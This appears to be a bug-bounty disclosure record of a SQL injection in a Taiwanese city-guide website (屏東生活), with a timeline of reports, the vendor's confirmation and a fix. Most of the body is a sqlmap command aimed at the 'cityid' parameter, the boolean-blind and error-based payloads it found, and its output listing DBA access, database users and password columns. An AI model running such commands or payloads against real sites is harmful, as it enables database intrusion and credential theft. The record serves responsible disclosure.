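2015-11-25: Details reported to the vendor; awaiting vendor response
2015-11-27: Vendor confirmed; details disclosed to the vendor only
2015-12-07: Details disclosed to core white hats and experts in related fields
2015-12-17: Details disclosed to regular white hats
2015-12-27: Details disclosed to intern white hats
2016-01-05: Vendor fixed the vulnerability and disclosed it voluntarily; details disclosed to the public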
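SQL injection vulnerability in the main site of 屏東生活 (DBA privileges | root password exposed | large number of users' plaintext passwords exposed)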
URL: http://**.**.**.**/foods/index.php?cityid=5
$ python sqlmap.py -u "http://**.**.**.**/foods/index.php?cityid=5" -p cityid --technique=BE --random-agent --batch --current-user --is-dba --users --passwords --count --search -C pass
---
Parameter: cityid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cityid=5 AND 8239=8239

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: cityid=5 AND (SELECT 7499 FROM(SELECT COUNT(*),CONCAT(0x716a706a71,(SELECT (ELT(7499=7499,1))),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0
current user: 'root@localhost'
current user is DBA: True
database management system users [4]:
[*] ''@'localhost'
[*] ''@'localhost.localdomain'
[*] 'root'@'localhost'
[*] 'root'@'localhost.localdomain'

database management system users password hashes:
[*] root [2]:

Database: ptnet
+------------+---------+
| Table      | Entries |
+------------+---------+
| ad3        | 103266  |
| main       | 43597   |
| service    | 10148   |
| blog       | 1171    |
| country    | 365     |
| submain    | 296     |
| `user`     | 205     |
| title      | 151     |
| talk       | 115     |
| city       | 25      |
| ad2        | 21      |
| showgoods  | 20      |
| mapdata    | 16      |
| showclass1 | 14      |
| ad         | 13      |
| class      | 12      |
| showclass  | 10      |
| talkclass  | 4       |
| admin      | 1       |
| pic        | 1       |
| showshop   | 1       |
+------------+---------+

Database: webinfo
+---------+---------+
| Table   | Entries |
+---------+---------+
| main    | 10912   |
| `pad`   | 4144    |
| ad3     | 858     |
| city    | 20      |
| ad2     | 19      |
| service | 16      |
| ad      | 13      |
| admin   | 1       |
| class   | 1       |
+---------+---------+

Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 553     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 126     |
| COLLATIONS                            | 126     |
| STATISTICS                            | 79      |
| KEY_COLUMN_USAGE                      | 76      |
| TABLES                                | 67      |
| TABLE_CONSTRAINTS                     | 56      |
| USER_PRIVILEGES                       | 52      |
| CHARACTER_SETS                        | 36      |
| SCHEMA_PRIVILEGES                     | 28      |
| SCHEMATA                              | 5       |
+---------------------------------------+---------+

Database: mysql
+--------+---------+
| Table  | Entries |
+--------+---------+
| `user` | 4       |
| db     | 2       |
+--------+---------+

columns LIKE 'pass' were found in the following databases:
Database: ptnet
Table: admin
[1 column]
+----------+
| Column   |
+----------+
| password |
+----------+

Database: ptnet
Table: user
[1 column]
+----------+
| Column   |
+----------+
| password |
+----------+

Database: webinfo
Table: admin
[1 column]
+----------+
| Column   |
+----------+
| password |
+----------+

Database: mysql
Table: user
[1 column]
+----------+
| Column   |
+----------+
| Password |
+----------+

Database: ptnet
Table: admin
[1 entry]

Database: ptnet
Table: user
[205 entries]

Database: webinfo
Table: admin
[1 entry]

Database: mysql
Table: user
[4 entries]

Database: ptnet
Table: ad3
[10 columns]
+------------+
| Column     |
+------------+
| adclass    |
| adid       |
| adname     |
| adtime     |
| classid    |
| pic        |
| pid        |
| state      |
| subclassid |
| url        |
+------------+
Deploy a WAF.
Severity: High
Vulnerability Rank: 17
Confirmed: 2015-11-27 23:14
Thank you for the report.
2016-01-05: Fix confirmed